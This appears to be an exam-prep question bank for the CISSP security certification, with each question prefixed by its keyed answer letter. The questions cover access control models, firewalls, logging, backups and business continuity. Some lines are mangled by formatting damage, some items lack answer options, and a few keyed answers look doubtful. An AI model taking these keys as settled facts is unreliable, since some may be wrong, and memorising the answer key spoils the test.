C#CISSP1 Q.89: In an organization, an Information Technology security function shoul^D: 	^A: Be a function within the information systems function of an organization.	^B: Report directly to a specialized business unit such as legal, corporate security or insurance.	^C: Be lead by a Chief Security Officer and report directly to the CEO.	^D: Be independent but report to the Information Systems function.
C#CISSP1 Q.90: Who of the following is responsible for ensuring that proper controls are in place to address integrity, confidentiality, and availability of IT systems and data? 	^A: Business and functional managers.	^B: IT Security practitioners.	^C: System and information owners.	^D: Chief information officer.
A#CISSP1 Q.91: The act of requiring two of the three factors to be used in the authentication process refers to? 	^A: Two-Factor Authentication	^B: One-Factor Authentication	^C: Bi-Factor Authentication	^D: Double Authentication
A#CISSP1 Q.92: This type of backup management provides a continuous on-line backup by using optical or tape jukeboxes, similar to WORMs, (Write Once, Read Many) 	^A: Hierarchical Storage Management (HSM).	^B: Hierarchical Resource Management (HRM).	^C: Hierarchical Access Management (HAM).	^D: Hierarchical Instance Management (HIM).
D#CISSP1 Q.93: Which of the following elements is not included in a Public Key Infrastructure (PKI)? 	^A: Timestamping	^B: Lightweight Directory Access Protocol (LDAP)	^C: Certificate revocation	^D: Internet Key Exchange (IKE)
B#CISSP1 Q.94: Which of the following best corresponds to the type of memory addressing where the address location that is specified in the program instruction contains the address of the final desired location? 	^A: Direct addressing	^B: Indirect addressing	^C: Indexed addressing	^D: Program addressing
B#CISSP1 Q.95: Creation and maintenance of intrusion detection systems and processes for the following is one of them identify it: 	^A: Event nonrepudiation	^B: Event notification	^C: Netware monitoring	^D: Guest access
A#CISSP1 Q.96: Which of the following is true related to network sniffing? 	^A: Sniffers allow an attacker to monitor data passing across a network.	^B: Sniffers alter the source address of a computer to disguise and exploit weak authentication methods,	^C: Sniffers take over network connections.	^D: Sniffers send IP fragments to a system that overlap with each other.
A#CISSP1 Q.97: Which of the following protocols is not implemented at the Internet layer of the TCP/IP protocol model? 	^A: User datagram protocol (UDP)	^B: Internet protocol (IP)	^C: Address resolution protocol (ARP)	^D: Internet control message protocol (ICMP)
B#CISSP1 Q.98: Which of the following is used to help business units understand the impact of a disruptive event? 	^A: A risk analysis.	^B: A business impact assessment.	^C: A vulnerability assessment.	^D: A disaster recovery plan.
B#CISSP1 Q.99: A contingency plan should address? 	^A: Potential risks	^B: Residual risks	^C: Identified risks	^D: All of the above
A#CISSP1 Q.100: In the OSI/ISO model, at what level is SET (SECURE ELECTRONIC TRANSACTION PROTOCOL) provided? 	^A: Application	^B: Network	^C: Presentation	^D: Session
A#CISSP1 Q.101: A packet filtering firewall looks at the data packet to get information about the source and destination addresses of an incoming packet, the session's communications protocol (TCP, UDP or ICMP), and the source destination application port for the? 	^A: Desired service	^B: Dedicated service	^C: Delayed service	^D: Distributed service.
A#CISSP1 Q.102: Packet Filtering Firewalls system is considered a? 	^A: First generation firewall.	^B: Second generation firewall.	^C: Third generation firewall.	^D: Fourth generation firewall.
D#CISSP1 Q.103: When should a post-mortem review meeting be held after an intrusion has been properly taken care of? 	^A: Within the first three months after the investigation of the intrusion is completed.	^B: Within the first week after prosecution of intruders have taken place, whether successful or not.	^C: Within the first month after the investigation of the intrusion is completed.	^D: Within the first week of completing the investigation of the intrusion.	
A#CISSP1 Q.104: Which of the following can be used as a covert channel?	^A: Storage and timing.	^B: Storage and low bits.	^C: Storage and permissions.	^D: Storage and classification.
C#CISSP1 Q.105: Which software development model is actually a meta-model that incorporates a number of the software development models? 	^A: The Waterfall model.	^B: The modified Waterfall model.	^C: The Spiral model.	^D: The Critical Patch Model (CPM).
B#CISSP1 Q.106: What is not true with pre -shared key authentication within IKE / IPsec protocol: 	^A: Pre-shared key authentication is normally based on simple passwords.	^B: Needs a PKI to work.	^C: Only one preshared key for all VPN connections is needed.	^D: Costly key management on large user groups.
D#CISSP1 Q.107: Which question is NOT true concerning Application Control? 	^A: It limits end users of applications in such a way that only particular screens are visible.	^B: Only specific records can be requested choice.	^C: Particular uses of the application can be recorded for audit purposes.	^D: Is non-transparent to the endpoint applications so changes are needed to the applications involved.
C#CISSP1 Q.108: In order to ensure the privacy and integrity of the data, conne ctions between firewalls over public networks should use? 	^A: Screened subnets	^B: Digital certificates	^C: Encrypted Virtual Private Networks	^D: Encryption
D#CISSP1 Q.109: What is necessary for a subject to have write access to an object in a Multi-Level Security Policy? 	^A: The subject's sensitivity label must dominate the object's sensitivity label.	^B: The subject's sensitivity label subordinates the object's sensitivity label.	^C: The subject's sensitivity label is subordinated by the object's sensitivity label.	^D: The subject's sensitivity label is dominated by the object's sensitivity label.
B#CISSP1 Q.110: What best describes a scenario when an employee has been shaving off pennies from multiple accounts and depositing the funds into his own ban account? 	^A: Data fiddling	^B: Data diddling	^C: Data hiding	^D: Data masking
A#CISSP1 Q.111: Which of the following is unlike the other three? 	^A: El Gamal	^B: Teardrop	^C: Buffer Overflow	^D: Smurf
D#CISSP1 Q.112: Phreakers are hackers who specialize in telephone frau^D: What type of telephone fraud manipulates the line voltage to receive a tool-free call? 	^A: Red Boxes	^B: Blue Boxes	^C: White Boxes	^D: Black Boxes
D#CISSP1 Q.113: Which of the following groups represents the leading source of computer crime losses? 	^A: Hackers	^B: Industrial saboteurs	^C: Foreign intelligence officers	^D: Employees
A#CISSP1 Q.114: Which of the following steps should be performed first in a business impact analysis (BIA)? 	^A: Identify all business units within the organization.	^B: Evaluate the impact of disruptive events.	^C: Estimate the Recovery Time Objectives (RTO).	^D: Evaluate the criticality of business functions.
C#CISSP1 Q.115: Which of the following embodies all the detailed actions that personnel are required to follow? 	^A: Standards	^B: Guidelines	^C: Procedures	^D: Baselines
D#CISSP1 Q.116: Immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length (up to two kilometers in some cases) is? 	^A: Coaxial cable	^B: Twisted Pair cable	^C: Axial cable	^D: Fiber Optic cable
A#CISSP1 Q.117: Which of the following is the most reliable, secure means of removing data from magnetic storage media such as a magnetic tape, or cassette? 	^A: Degaussing	^B: Parity Bit Manipulation	^C: Certification	^D: Buffer overflow
A#CISSP1 Q.118: Which of the following is an advantage of prototyping? 	^A: Prototype systems can provide significant time and cost savings.	^B: Change control is often less complicated with prototype systems.	^C: It ensures that functions or extras are not added to the intended system.	^D: Strong internal controls are easier to implement.
A#CISSP1 Q.119: The IS security analyst's participation in which of the following system development life cycle phases provides maximum benefit to the organization? 	^A: System requirements definition.	^B: System design.	^C: Program development.	^D: Program testing.
C#CISSP1 Q.120: Controls are implemented to? 	^A: Eliminate risk and reduce the potential for loss.	^B: Mitigate risk and eliminate the potential for loss.	^C: Mitigate risk and reduce the potential for loss.	^D: Eliminate risk and eliminate the potential for loss.
A#CISSP1 Q.121: A circuit level gateway is ________ when compared to an application level firewall. 	^A: Easier to maintain.	^B: More difficult to maintain.	^C: More secure.	^D: Slower
C#CISSP1 Q.122: In IPSec, if the communication mode is gateway-gateway or host-gateway: 	^A: Only tunnel mode can be used.	^B: Only transport mode can be used.	^C: Encapsulating Security Payload (ESP) authentication must be used.	^D: Both tunnel and transport mode can be used.
C#CISSP1 Q.123: Which integrity model defines a constrained data item, an integrity verification procedure and a transformation procedure? 	^A: The Take-Grant model	^B: The Biba integrity model	^C: The Clark Wilson integrity model	^D: The Bell-LaPadula integrity model
A#CISSP1 Q.124: Which of the following rules pertaining to a Business Continuity Plan/Disaster Recovery Plan is incorrect? 	^A: In order to facilitate recover, a single plan should cover all locations.	^B: There should be requirements for to form a committee to decide a course of action. These decisions should be made ahead of time and incorporated into the plan.^C: In its procedures and tasks, the plan should refer to functions, not specific individuals.	^D: Critical vendors should be contacted ahead of time to validate equipment can be obtained in a timely manner.
C#CISSP1 Q.125: What are suitable protocols for securing VPN connections? 	^A: S/MIME and SSH	^B: TLS and SSL	^C: IPsec and L2TP	^D: PKCS and X.509
D#CISSP1 Q.126: Which of the following questions is less likely to help in assessing identification and authentication controls? 	^A: Is a current list maintained and approved of authorized users and their access?	^B: Are passwords changed at least every ninety days or earlier if needed?	^C: Are inactive user identifications disabled after a specified period of time?	^D: Is there a process for reporting incidents?
B#CISSP1 Q.127: The primary purpose for using one -way encryption of user passwords within a system is which of the following? 	^A: It prevents an unauthorized person from trying multiple passwords in one logon attempt.	^B: It prevents an unauthorized person from reading or modifying the password list.	^C: It minimizes the amount of storage required for user passwords.	^D: It minimizes the amount of processing time used for encrypting passwords.
D#CISSP1 Q.128: The security of a computer application is most effective and economical in which of the following cases? 	^A: The system is optimized prior to the addition of security.	^B: The system is procured off-the-shelf.	^C: The system is customized to meet the specific security threat.	^D: The system is designed originally to provide the necessary security.
D#CISSP1 Q.129: In the following choices there is one that is a typical biometric characteristics that is not used to uniquely authenticate an individual's identity? 	^A: Retina scans	^B: Iris scans	^C: Palm scans	^D: Skin scans
A#CISSP1 Q.130: Which of the following proves or disproves a specific act though oral testimony based on information gathered through the witness's five senses? 	^A: Direct evidence	^B: Circumstantial evidence	^C: Conclusive evidence	^D: Corroborative evidence
B#CISSP1 Q.131: Which of the following would be defined as an absence of safeguard that could be exploited? 	^A: A threat	^B: A vulnerability	^C: A risk	^D: An exposure
D#CISSP1 Q.132: Which of the following is a LAN transmission protocol? 	^A: Ethernet	^B: Ring topology	^C: Unicast	^D: Polling
B#CISSP1 Q.133: Why would a database be denormalized?	^A: To ensure data integrity.	^B: To increase processing efficiency.	^C: To prevent duplication of data.	^D: To save storage space.
C#CISSP1 Q.134: Under ""Named Perils"" form of Property insurance "	^A: Burden of proof that particular loss is covered is on Insurer.	^B: Burden of proof that particular loss is not covered is on Insurer.	^C: Burden of proof that particular loss is covered is on Insured.	^D: Burden of proof that particular loss is not covered is on Insured.
C#CISSP1 Q.135: The following is not true:	^A: Since the early days of mankind humans have struggled with the problems of protecting assets.	^B: The addition of a PIN keypad to the card reader was a solution to unreported card or lost card problem.	^C: There has never been of problem of lost keys.	^D: Human guard is an inefficient and sometimes ineffective method of protecting resources.
C#CISSP1 Q.136: Which of the following statements pertaining to software testing approaches is correct? 	^A: A bottom-up approach allows interface errors to be detected earlier.	^B: A top-down approach allows errors in critical modules to be detected earlier.	^C: The test plan and results should be retained as part of the system's permanent documentation.	^D: Black box testing is predicted on a close examination of procedural detail.
C#CISSP1 Q.137: Which Orange Book evaluation level is described as ""Structured Protection""? "	^A: A1	^B: B3	^C: B2	^D: B1
C#CISSP1 Q.138: Which of the following questions should any user not be able to answer regarding their organization information security policy? ^A: Who is involved in establishing the security policy?	^B: Where is the organization security policy defined?	^C: What are the actions that need to be performed in case of a disaster?	^D: Who is responsible for monitoring compliance to the organization security policy?
A#CISSP1 Q.139: RAID Level 1 mirrors the data from one disk to set of disks using which of the following techniques? 	^A: Copying the data onto another disk or set of disks.	^B: Moving the data onto another disk or set of disks.^C: Establishing dual connectivity to another disk or set of disks.	^D: Establishing dual addressing to another disk or set of disks.
A#CISSP1 Q.140: Which type of firewall can be used to track connectionless protocols such as UDP and RPC? 	^A: Statefull inspection firewalls	^B: Packet filtering firewalls	^C: Application level firewalls	^D: Circuit level firewalls
C#CISSP1 Q.141: Which of the following items should not be retained in an E-mail directory? 	^A: Drafts of documents.	^B: Copies of documents.	^C: Permanent records.	^D: Temporary documents.
C#CISSP1 Q.142: Which of the following department managers would be best suited to oversee the development of an information security policy? 	^A: Information systems	^B: Human resources	^C: Business operations	^D: Security administration
B#CISSP1 Q.143: Which of the following counterme asures is not appropriate for war dialing attacks? 	^A: Monitoring and auditing for such activity.	^B: Disabling call forwarding.	^C: Making sure only necessary phone numbers are made public.	^D: Using completely different numbers for voice and data accesses.
B#CISSP1 Q.144: Which of the following tools is less likely to be used by a hacker? 	^A: I0phtcrack	^B: Tripwire	^C: Crack	^D: John the Ripper
A#CISSP1 Q.145: Which of the following logical access exposures involves changing data before, or as it is entered into the computer? 	^A: Data diddling	^B: Salami techniques	^C: Trojan horses	^D: Viruses
B#CISSP1 Q.146: Which of the following computer aided software engineering (CASE) products is used for developing detailed designs, such as screen and report layouts? ^A: Lower CASE	^B: Middle CASE	^C: Upper CASE	^D: I-CASE
C#CISSP1 Q.147: What is called the number of columns in a table? 	^A: Schema	^B: Relation	^C: Degree	^D: Cardinality
B#CISSP1 Q.148: Which of the following is the most reliable authentication device? 	^A: Variable callback system	^B: Smart Card system	^C: Fixed callback system	^D: Combination of variable and fixed callback system.
C#CISSP1 Q.149: Which of the following firewall rules is less likely to be found on a firewall installed between and organization internal network and the Internet? 	^A: Permit all traffic to and from local host.	^B: Permit all inbound ssh traffic	^C: Permit all inbound tcp connections.	^D: Permit all syslog traffic to log-server.abc.org.
B#CISSP1 Q.150: The Internet can be utilized by either? 	^A: Public or private networks (with a Virtual Private Networks).	^B: Private or public networks (with a Virtual Private Networks).	^C: Home or private networks (with a Virtual Private Networks).	^D: Public or home networks (with a Virtual Private Networks).
A#CISSP1 Q.151: This backup method must be made regardless of whether Differential or Incremental methods are use^D: 	^A: Full Backup Method	^B: Incremental backup method	^C: Differential backup method	^D: Tape backup method
D#CISSP1 Q.152: Why do buffer overflows happen? 	^A: Because buffers can only hold so much data.	^B: Because input data is not checked for appropriate length at time of input.	^C: Because they are an easy weakness to exploit.	^D: Because of insufficient system memory.
C#CISSP1 Q.153: Which of the following should not be performed by an operator? 	^A: Mounting disk or tape	^B: Backup and recovery	^C: Data entry	^D: Handling hardware
C#CISSP1 Q.154: What security model is dependant on security labels? 	^A: Discretionary access control	^B: Label-based access control	^C: Mandatory access control	^D: Non-discretionary access control
A#CISSP1 Q.155: Detection capabilities of Host-based ID systems are limited by the incompleteness of which of the following? 	^A: Audit log capabilities	^B: Event capture capabilities	^C: Event triage capabilities	^D: Audit notification capabilities
B#CISSP1 Q.156: Computer crime is generally made possible by which of the following? 	^A: The perpetrator obtaining training & special knowledge.	^B: Victim carelessness.	^C: Collusion with others in information processing	^D: System design flaws.
A#CISSP1 Q.157: The structures, transmission methods, transport formats, and security measures that are used to provide integrity, availability, authentication, and confidentiality for transmissions over private and public communications networks and media includes? 	^A: The Telecommunications and Network Security domain.	^B: The Telecommunications and Netware Security domain.	^C: The Technical communications and Network Security domain.	^D: The Telnet and Network Security domain.
A#CISSP1 Q.158: Which of the following is the lowest TCSEC class where in the sys tem must protected against covert storage channels (but not necessarily covert timing channels)? 	^A: B2	^B: B1	^C: B3	^D: A1
C#CISSP1 Q.159: Which type of control is concerned with avoiding occurrences of risks? 	^A: Deterrent controls	^B: Detective controls	^C: Preventive controls	^D: Compensating controls
A#CISSP1 Q.160: The basic function of an FRDS is to? 	^A: Protect file servers from data loss and a loss of availability due to disk failure.	^B: Persistent file servers from data gain and a gain of availability due to disk failure.	^C: Prudent file servers from data loss and a loss of acceptability due to disk failure.	^D: Packet file servers from data loss and a loss of accountability due to disk failure.
D#CISSP1 Q.161: Which of the following protocols does not operate at the data link layer (layer 2)? 	^A: PPP	^B: RARP	^C: L2F	^D: ICMP
A#CISSP1 Q.162: This tape format can be used to backup data systems in addition to its original intended audio used by: 	^A: Digital Audio tape (DAT)	^B: Digital video tape (DVT)	^C: Digital Casio Tape (DCT)	^D: Digital Voice Tape (DVT)
C#CISSP1 Q.163: By examining the ""state"" and ""context"" of the incoming data packets, it helps to track the protocols" "that are considered ""connectionless"", such as UDP-based applications and Remote Procedure Calls" (RPC). This type of firewall system is used in? 	^A: First generation firewall systems.	^B: Second generation firewall systems.	^C: Third generation firewall systems.	^D: Fourth generation firewall systems.
A#CISSP1 Q.164: Guards are appropriate whenever the function required by the security program involves which of the following?	^A: The use of discriminating judgment.	^B: The use of physical force.	^C: The operation of access control devices.	^D: The need to detect unauthorized access.
A#CISSP1 Q.165: A server cluster looks like a? 	^A: Single server from the user's point of view.	^B: Dual server from the user's point of view.	^C: Tripe server from the user's point of view.	^D: Quardle server from the user's point of view.
D#CISSP1 Q.166: Which of the following are functions that are compatible in a properly segregated environment? 	^A: Application programming and computer operation.	^B: System programming and job control analysis.	^C: Access authorization and database administration.	^D: System development and systems maintenance.
B#CISSP1 Q.167: Encryption is applicable to all of the following OSI/ISO layers except: 	^A: Network layer	^B: Physical layer	^C: Session layer	^D: Data link layer
A#CISSP1 Q.168: The Computer Security Policy Model the Orange Book is based on is which of the following? 	^A: Bell-LaPadula	^B: Data Encryption Standard	^C: Kerberos	^D: Tempest
A#CISSP1 Q.169: Which type of attack would a competitive intelligence attack best classify as?	^A: Business attack	^B: Intelligence attack	^C: Financial attack	^D: Grudge attack
C#CISSP1 Q.170: Which of the following is responsible for the most security issues? 	^A: Outside espionage	^B: Hackers	^C: Personnel	^D: Equipment failure
A#CISSP1 Q.171: Which of the following goals is NOT a goal of Problem Management? 	^A: To eliminate all problems.	^B: To reduce failures to a manageable level.	^C: To prevent the occurrence or re-occurrence of a problem.	^D: To mitigate the negative impact of problems on computing services and resources.
D#CISSP1 Q.172: Examples of types of physical access controls include all except which of the following? 	^A: badges	^B: locks	^C: guards	^D: passwords
C#CISSP1 Q.173: Which of the following statements pertaining to the (ISC)2 Code of Ethics is incorrect? 	^A: All information systems security professionals who are certified by (ISC)2 recognize that such a certification is a privilege that must be both earned and maintained.	^B: All information systems security professionals who are certified by (ISC)2 shall provide diligent and competent service to principals.	^C: All information systems security professionals who are certified by (ISC)2 shall discourage such behavior as associating or preparing to associate with criminals or criminal behavior.	^D: All information systems security professionals who are certified by (ISC)2 shall promote the understanding and acceptance of prudent information security measures.
C#CISSP1 Q.174: Which DES modes can best be used for authentication? 	^A: Cipher Block Chaining and Electronic Code Book.	^B: Cipher Block Chaining and Output Feedback.	^C: Cipher Block Chaining and Cipher Feedback.	^D: Output Feedback and Electronic Code Book.
A#CISSP1 Q.175: In the OSI / ISO model, at what layer are some of the SLIP, CSLIP, PPP control functions are provided? 	^A: Link	^B: Transport	^C: Presentation	^D: Application
B#CISSP1 Q.176: Which of the following best describes the purpose of debugging programs? 	^A: To generate random data that can be used to test programs before implementing them	^B: To ensure that program coding flaws are detected and corrected.	^C: To protect, during the programming phase, valid changes from being overwritten by other changes.	^D: To compare source code versions before transferring to the test environment.
A#CISSP1 Q.177: With RAID Level 5 the spare drives that replace the failed drives are usually hot swappable, meaning the can be replaced on the server while the? 	^A: System is up and running.	^B: System is down and running.	^C: System is in-between and running.	^D: System is centre and running.
A#CISSP1 Q.178: What is the process that RAID Level 0 uses as it creates one large disk by using several disks? 	^A: Striping	^B: Mirroring	^C: Integrating	^D: Clustering
A#CISSP1 Q.179: Which of the following is used to create and delete views and relations within tables? 	^A: SQL Data Definition Language	^B: SQL Data Manipulation Language	^C: SQL Data Relational Language	^D: SQL Data Identification Language
B#CISSP1 Q.180: Which division of the Orange Book deals with discretionary protection (need-to-know)? 	^A: D	^B: C	^C: B	^D: A
C#CISSP1 Q.181:The Diffie -Hellman algorithm is used for? 	^A: Encryption	^B: Digital signature	^C: Key exchange	^D: Non-repudiation
A#CISSP1 Q.182: Primary run when time and tape space permits, and is used for the system archive or baselined tape sets is the?	^A: Full backup method.	^B: Incremental backup method.	^C: Differential backup method.	^D: Tape backup method.				
C#CISSP1 Q.183: Which of the following teams should not be included in an organization's contingency plan? 	^A: Damage assessment team.	^B: Hardware salvage team.	^C: Tiger team.	^D: Legal affairs team.
B#CISSP2 Q.1:  Covert channel is a communication channel that can be used for:	^A: Hardening the system.	^B: Violating the security policy.	^C: Protecting the DMZ.	"^D: Strengthening the security policy."""
C#CISSP2 Q.2:  To ensure that integrity is attainted through the Clark and Wilson model, certain rules are neede. These rules are:	^A: Processing rules and enforcement rules.	^B: Integrity-bouncing rules.	^C: Certification rules and enforcement rules.	^D: Certification rules and general rules.				
D#CISSP2 Q.3:  What was introduces for circumventing difficulties in classic approaches to computer security by limiting damages produces by malicious programs?	^A: Integrity-preserving	^B: Ref Mon	^C: Integrity-monitoring	^D: Non-Interference				
A#CISSP2 Q.4:  What is an indirect way to transmit information with no explicit reading of confidential information?	^A: Covert channels	^B: Backdoor	^C: Timing channels	^D: Overt channels
B#CISSP2 Q.5:  Which of the following are the limitations of the BLP model? 	^A: No policies for changing access data control.	^B: All of the choices.	^C: Contains covert channels.	^D: Static in nature.
B#CISSP2 Q.6:  Which of the following are the two most well known access control models? 	^A: Lattice and Biba	^B: Bell LaPadula and Biba	^C: Bell LaPadula and Chinese war	^D: Bell LaPadula and Info Flow
A#CISSP2 Q.7:  What can be defined as a formal security model for the integrity of subjects and objects in a system? 	^A: Biba	^B: Bell LaPadulaLattice	^C: Lattice	^D: Info Flow
D#CISSP2 Q.8:  Which of the following is best known for capturing security requirements of commercial applications? 	^A: Lattice	^B: Biba	^C: Bell LaPadula	^D: Clark and Wilson
B#CISSP2 Q.9:  The Clark Wilson model has its emphasis on: 	^A: Security	^B: Integrity	^C: Accountability	^D: Confidentiality
B#CISSP2 Q.10:  Which of the following is a state machine model capturing confidentiality aspects of access control? 	^A: Clarke Wilson	^B: Bell-LaPadula	^C: Chinese Wall	^D: Lattice
C#CISSP2 Q.11:  With the BLP model, access permissions are defined through: 	^A: Filter rules	^B: Security labels	^C: Access Control matrix	^D: Profiles
B#CISSP2 Q.12:  With the BLP model, security policies prevent information flowing downwards from a: 	^A: Low security level	^B: High security level	^C: Medium security level	^D: Neutral security level
D#CISSP2 Q.13:  When will BLP consider the information flow that occurs? 	^A: When a subject alters on object.	^B: When a subject accesses an object.	^C: When a subject observer an object.	^D: All of the choices.
C#CISSP2 Q.14:  Separation of duties is valuable in deterring: 	^A: DoS	^B: external intruder	^C: fraud	^D: trojan house
C#CISSP2 Q.15:  What principle requires that for particular sets of transactions, no single individual be allowed to execute all transactions within the set? 	^A: Use of rights	^B: Balance of power	^C: Separation of duties	^D: Fair use
D#CISSP2 Q.16:  Separation of duty can be: 	^A: Dynamic only	^B: Encrypted	^C: Static only	^D: Static or dynamic
A#CISSP2 Q.17:  Who should determine the appropriate sensitivity classifications of information? 	^A: Owner	^B: Server	^C: Administrator	^D: User
A#CISSP2 Q.18:  Who should determine the appropriate access control of information? 	^A: Owner	^B: User	^C: Administrator	^D: Server
D#CISSP2 Q.19:  What principle requires that a user be given no more privilege then necessary to perform a job? 	^A: Principle of aggregate privilege.	^B: Principle of most privilege.	^C: Principle of effective privilege.	^D: Principle of least privilege.
B#CISSP2 Q.20:  To ensure least privilege requires that __________ is identified. 	^A: what the users privilege owns	^B: what the users job is	^C: what the users cost is	^D: what the users group is
B#CISSP2 Q.21:  The concept of least privilege currently exists within the context of: 	^A: ISO	^B: TCSEC	^C: OSI	^D: IEFT
B#CISSP2 Q.22:  Enforcing minimum privileges for general system users can be easily achieved through the use of: 	^A: TSTEC	^B: RBAC	^C: TBAC	^D: IPSEC
B#CISSP2 Q.23:  Which of the following are potential firewall problems that should be logged? 	^A: Reboot	^B: All of the choices.	^C: Proxies restarted.	^D: Changes to configuration file.
A#CISSP2 Q.24:  Which of the following are security events on Unix that should be logged? 	^A: All of the choices.	^B: Use of Setgid.	^C: Change of permissions on system files.	^D: Use of Setuid.
B#CISSP2 Q.25:  What process determines who is trusted for a given purpose? 	^A: Identification	^B: Authorization	^C: Authentication	^D: Accounting
B#CISSP2 Q.26:  Which of the following tools can you use to assess your networks vulnerability? 	^A: ISS	^B: All of the choices.	^C: SATAN	^D: Ballista
D#CISSP2 Q.27:  Which of the following should NOT be logged for performance problems? 	^A: CPU load.	^B: Percentage of use.	^C: Percentage of idle time.	^D: None of the choices.
A#CISSP2 Q.28:  Which of the following should be logged for security problems? 	^A: Use of mount command.	^B: Percentage of idle time.	^C: Percentage of use.	^D: None of the choices.
B#CISSP2 Q.29:  Which of the following services should be logged for security purpose? 	^A: bootp	^B: All of the choices.	^C: sunrpc	^D: tftp
D#CISSP2 Q.30:  Who should NOT have access to the log files? 	^A: Security staff.	^B: Internal audit staff.	^C: System administration staff.	^D: Managers secretary.
C#CISSP2 Q.31:  Which of the following correctly describe the use of the collected logs? 	^A: They are used in the passive monitoring process only.	^B: They are used in the active monitoring process only.	^C: They are used in the active and passive monitoring process.	^D: They are used in the archiving process only.
C#CISSP2 Q.32:  All logs are kept on archive for a period of time. What determines this period of time? 	^A: Administrator preferences.	^B: MTTR	^C: Retention polices	^D: MTTF
C#CISSP2 Q.33:  Logs must be secured to prevent: 	^A: Creation, modification, and destruction.	^B: Modification, deletion, and initialization.	^C: Modification, deletion, and destruction.	^D: Modification, deletion, and inspection.
A#CISSP2 Q.34:  To ensure dependable and secure logging, all computers must have their clock synchronized to: 	^A: A central timeserver.	^B: The log time stamp.	^C: The respective local times.	^D: None of the choices.
B#CISSP2 Q.35:  To ensure dependable and secure logging, logging information traveling on the network should be: 	^A: Stored	^B: Encrypted	^C: Isolated	^D: Monitored
A#CISSP2 Q.36:  The activity that consists of collecting information that will be used for monitoring is called: 	^A: Logging	^B: Troubleshooting	^C: Auditing	^D: Inspecting
B#CISSP2 Q.37:  How often should logging be run? 	^A: Once every week.	^B: Always	^C: Once a day.	^D: During maintenance.
A#CISSP2 Q.38:  If the computer system being used contains confidential information, users must not: 	^A: Leave their computer without first logging off.	^B: Share their desks.	^C: Encrypt their passwords.	^D: Communicate
A#CISSP2 Q.39:  Security is a process that is: 	^A: Continuous	^B: Indicative	^C: Examined	^D: Abnormal
C#CISSP2 Q.40:  Which of the following user items can be shared? 	^A: Password	^B: Home directory	^C: None of the choices.
B#CISSP2 Q.41:  Root login should only be allowed via:	^A: Rsh	^B: System console	^C: Remote program	^D: VNC
B#CISSP2 Q.42:  What should you do to the user accounts as soon as employment is terminated? 	^A: Disable the user accounts and erase immediately the data kept.	^B: Disable the user accounts and have the data kept for a specific period of time.	^C: None of the choices.	^D: Maintain the user accounts and have the data kept for a specific period of time.
D#CISSP2 Q.43:  Access to the _________ account on a Unix server must be limited to only the system administrators that must absolutely have this level of access. 	^A: Superuser of inetd.	^B: Manager or root.	^C: Fsf or root	^D: Superuser or root.
D#CISSP2 Q.44:  Which of the following correctly describe good security practice? 	^A: Accounts should be monitored regularly.	^B: You should have a procedure in place to verify password strength.	^C: You should ensure that there are no accounts without passwords.	^D: All of the choices.
A#CISSP2 Q.45:  LOMAC is a security enhancement for what operating system? 	^A: Linux	^B: Netware	^C: Solaris
B#CISSP2 Q.46:  LOMAC uses what Access Control method to protect the integrity of processes and data? 	^A: Linux based EFS.	^B: Low Water-Mark Mandatory Access Control.	^C: Linux based NFS.	^D: High Water-Mark Mandatory Access Control.
D#CISSP2 Q.47:  On Linux, LOMAC is implemented as: 	^A: Virtual addresses	^B: Registers	^C: Kernel built in functions	^D: Loadable kernel module
B#CISSP2 Q.49:  What is the me thod of coordinating access to resources based on the listening of permitted IP addresses? 	^A: MAC	^B: ACL	^C: DAC	^D: None of the choices.
A#CISSP2 Q.50:  With RBAC, each user can be assigned: 	^A: One or more roles.	^B: Only one role.	^C: A token role.	^D: A security token.
C#CISSP2 Q.51:  With RBAC, roles are: 	^A: Based on labels.	^B: All equal	^C: Hierarchical	^D: Based on flows.
C#CISSP2 Q.52:  With __________, access decisions are based on the roles that individual users have as part of an organization. 	^A: Server based access control.	^B: Rule based access control.	^C: Role based access control.	^D: Token based access control.
C#CISSP2 Q.53:  Under Role based access control, access rights are grouped by: 	^A: Policy name	^B: Rules	^C: Role name	^D: Sensitivity label
C#CISSP2 Q.54:  Which of the following will you consider as a role under a role based access control system? 	^A: Bank rules	^B: Bank computer	^C: Bank teller	^D: Bank network
B#CISSP2 Q.55:  Role based access control is attracting increasing attention particularly for what applications? 	^A: Scientific	^B: Commercial	^C: Security	^D: Technical
D#CISSP2 Q.56:  What is one advantage of deploying Role based access control in large networked applications? 	^A: Higher security	^B: Higher bandwidth	^C: User friendliness	^D: Lower cost
B#CISSP2 Q.57:  DAC and MAC policies can be effectively replaced by: 	^A: Rule based access control.	^B: Role based access control.	^C: Server based access control.	^D: Token based access control
B#CISSP2 Q.58:  Which of the following correctly describe Role based access control? 	^A: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your user profile groups.	^B: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your	organizations structure.	^C: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ticketing system.	^D: It allows you to specify and enforce enterprise-specific security policies in a way that maps to your ACL.
D#CISSP2 Q.59:  Which of the following RFC talks about Rule Based Security Policy? 	^A: 1316 ^B: 1989	^C: 2717	^D: 2828
A#CISSP2 Q.60:  With Rule Based Security Policy, a security policy is based on: 	^A: Global rules imposed for all users.	^C: Global rules imposed for no body.	^D: Global rules imposed for only the local users.
C#CISSP2 Q.61:  With Rule Based Security Policy, global rules usually rely on comparison of the _______ of the resource being accesse^D: 	^A: A group of users.	^B: Users	^C: Sensitivity	^D: Entities
C#CISSP2 Q.62:  What control is based on a specific profile for each user? 	^A: Lattice based access control.	^B: Directory based access control.	^C: Rule based access control.	^D: ID based access control.
A#CISSP2 Q.63:  In a very large environment, which of the following is an administrative burden? 	^A: Rule based access control.	^B: Directory based access control.	^C: Lattice based access control	^D: ID bases access control
A#CISSP2 Q.64:  Which of the following is a feature of the Rule based access control? 	^A: The use of profile.	^B: The use of information flow label.	^C: The use of data flow diagram.	^D: The use of token.
D#CISSP2 Q.65:  A firewall can be classified as a: 	^A: Directory based access control.	^B: Rule based access control.	^C: Lattice based access control.	^D: ID based access control.
C#CISSP2 Q.66:  The Lattice Based Access Control model was developed MAINLY to deal with: 	^A: Affinity	^B: None of the choices.	^C: Confidentiality	^D: Integrity
B#CISSP2 Q.67:  With the Lattice Based Access Control model, a security class is also called a: 	^A: Control factor	^B: Security label	^C: Mandatory number	^D: Serial ID
A#CISSP2 Q.68:  Under the Lattice Based Access Control model, a container of information is a(n): 	^A: Object	^B: Model	^C: Label
A#CISSP2 Q.69:  What Access Control model was developed to deal mainly with information flow in computer	systems? 	^A: Lattice Based	^B: Integrity Based	^C: Flow Based	^D: Area Based
